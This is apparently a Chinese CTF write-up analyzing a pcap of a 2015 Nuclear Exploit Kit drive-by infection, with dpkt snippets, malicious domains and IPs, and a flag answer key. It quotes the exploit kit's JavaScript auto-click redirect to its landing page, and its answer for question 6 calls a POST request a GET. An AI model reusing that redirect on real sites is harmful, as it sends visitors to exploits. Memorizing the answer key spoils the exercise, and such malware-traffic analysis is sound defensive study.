玄机靶场-2015-01-09-Traffic analysis exercise WP这道题是一道纯流量分析题考的是 Nuclear Exploit Kit 的完整感染链分析。没有靶机环境直接给了一个 pcap 文件用 Python/dpkt 重组 TCP 流来回答 8 个问题。整体难度中等关键在于理解 EK 的攻击流程以及知道 Wireshark 的 tcp.stream 编号规则。1. 确认活动时间UTC打开 pcap 后看第一个数据包的时间戳直接就是答案。用 dpkt 读取withopen(traffic.pcap,rb)asf:pcapdpkt.pcap.Reader(f)forts,bufinpcap:print(datetime.datetime.utcfromtimestamp(ts))break第一个包时间戳对应 UTC 时间 2015-01-05 16:24:40。注意题目文件名是 2015-01-09但实际流量日期是 1 月 5 日别被文件名带偏。Flag 12015-01-05 16:24:402. 受害 Windows 主机的 IP 和 MAC 地址流量里只有一个内网 IP192.168.204.137其余都是外网服务器。MAC 地址从以太网帧头提取ethdpkt.ethernet.Ethernet(buf)src_mac:.join(%02x%bforbineth.src)# - 00:0c:29:9d:b8:6d00:0c:29开头是 VMware 的 OUI说明这是一台 VMware 虚拟机典型的分析环境。Flag 2192.168.204.137,00:0c:29:9d:b8:6d3. 受感染网站的 IP 和域名整个感染链的入口是受害者通过 Google 搜索结果点进去的一个匈牙利网站。从 tcp.stream 0 的 HTTP 请求可以看到GET http://www.opushangszer.hu/ HTTP/1.1 Referer: http://www.google.si/url?urlhttp://www.opushangszer.hu/...这个网站的 IP 是94.199.178.119它的页面里嵌入了恶意 SWF触发了后续的 EK 感染链。这是典型的 Drive-by Download 场景合法网站被植入了恶意代码。Flag 394.199.178.119,www.opushangszer.hu4. 漏洞利用工具包EK的 IP 和域名这套 EK 是 Nuclear Exploit KitC2 域名是static.domainvertythephones.com解析到167.160.46.121。从 tcp.stream 3、4、5 可以看到所有与 EK 的通信都指向这个 IP。域名用了static.前缀伪装成静态资源服务器是 EK 的常见混淆手段。Flag 4167.160.46.121,static.domainvertythephones.com5. 受害主机使用的浏览器从所有 HTTP 请求的 User-Agent 字段可以看到Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)这是 Internet Explorer 8运行在 Windows 7NT 6.1上。IE 8 是 2015 年初仍然常见的老版本浏览器对各种 EK 的漏洞利用几乎没有防御能力。Flag 5Internet Explorer 86. 返回 EK 重定向的 HTTP 请求参数值感染链的中间跳板是akronkappas.com。受感染网站opushangszer.hu里的恶意 SWFd6bc1dc7da4ed54a62b93b5d0f1cc40c.swf在 Flash 执行后向akronkappas.com发了一个 POST 请求POST /d2a42e1f7d9a1021bd7d93af414c95c4.php?q70a9b40eb73da11445c3a3609c8241d9 HTTP/1.1 Host: akronkappas.com Referer: http://imprintchurch.org/d6bc1dc7da4ed54a62b93b5d0f1cc40c.swf服务器响应返回了一段 HTML里面用 JavaScript 自动点击一个链接跳转到 EKaidmyLinkhrefhttp://static.domainvertythephones.com/3h251q2c35click/ascriptdocument.getElementById(myLink).click();/script题目问的是 GET 请求里唯一的参数值即q参数的值。Flag 670a9b40eb73da11445c3a3609c8241d97. 包含恶意软件负载的 tcp.stream整个流量里共有 6 个 TCP 流tcp.stream 0~5tcp.stream连接内容0→ 94.199.178.119:80受感染网站页面1→ 75.126.113.164:80恶意 SWF 文件942 bytes2→ 69.65.9.55:80Flash POST 请求 EK 跳转响应3→ 167.160.46.121:80EK Landing Pagegzip 压缩 HTML4→ 167.160.46.121:80恶意软件负载242,285 bytesapplication/octet-stream5→ 167.160.46.121:80EK 后续 HTML 响应tcp.stream 4 是关键服务器返回了一个 242,285 bytes 的application/octet-stream文件这是经过 XOR 加密的 PE 可执行文件恶意软件负载。Nuclear EK 惯用 XOR 加密 payload 来绕过 IDS 检测。在 Wireshark 里用过滤器tcp.stream eq 4可以隔离出这条流。Flag 7tcp.stream eq 48. Flash 播放器版本Flash 版本信息隐藏在 HTTP 请求头里。在 tcp.stream 1请求恶意 SWF和 tcp.stream 3访问 EK Landing Page的请求头中都有flash-version: 11,8,800,94这是 Flash Player 11.8.800.94是 2013 年的版本存在多个已知漏洞正是 Nuclear EK 利用的目标。Flag 811.8.800.94总结这道题还原了一条完整的 Nuclear EK 感染链用户通过 Google 点进被植入恶意代码的匈牙利网站 → 触发恶意 SWF → Flash 向跳板服务器 POST 请求 → 跳板返回 EK 链接 → EK Landing Page 检测环境 → 下载 XOR 加密的恶意软件 payload。整个过程不到 2 分钟受害者全程无感知。Flag 汇总步骤问题答案1活动时间UTC2015-01-05 16:24:402受害主机 IP 和 MAC192.168.204.137,00:0c:29:9d:b8:6d3受感染网站 IP 和域名94.199.178.119,www.opushangszer.hu4EK IP 和域名167.160.46.121,static.domainvertythephones.com5浏览器Internet Explorer 86GET 参数值70a9b40eb73da11445c3a3609c8241d97恶意软件负载所在流tcp.stream eq 48Flash 版本11.8.800.94